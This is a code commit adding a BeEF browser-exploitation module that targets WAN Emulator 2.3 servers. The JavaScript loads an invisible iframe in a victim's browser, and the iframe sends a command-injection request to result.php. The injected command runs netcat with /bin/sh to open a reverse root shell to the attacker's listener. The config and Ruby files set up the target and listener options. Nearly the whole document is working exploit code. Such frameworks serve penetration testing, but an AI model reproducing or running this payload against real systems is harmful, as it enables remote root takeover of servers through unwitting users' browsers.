Added WAN Emulator command execution exploit

modules/exploits/wanem_command_execution/command.js

@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var wanem_iframe = beef.dom.createInvisibleIframe();
+  wanem_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,'+lhost+','+lport+',-e,/bin/sh}%26');
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wanem_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+

modules/exploits/wanem_command_execution/config.yaml

@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
+################################################################################
+beef:
+    module:
+        wanem_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "WAN Emulator Command Execution"
+            description: "Attempts to get a reverse root shell on a WAN Emulator server.<br/>Tested on version 2.3 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/exploits/wanem_command_execution/module.rb

@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+class Wanem_command_execution < BeEF::Core::Command
+
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end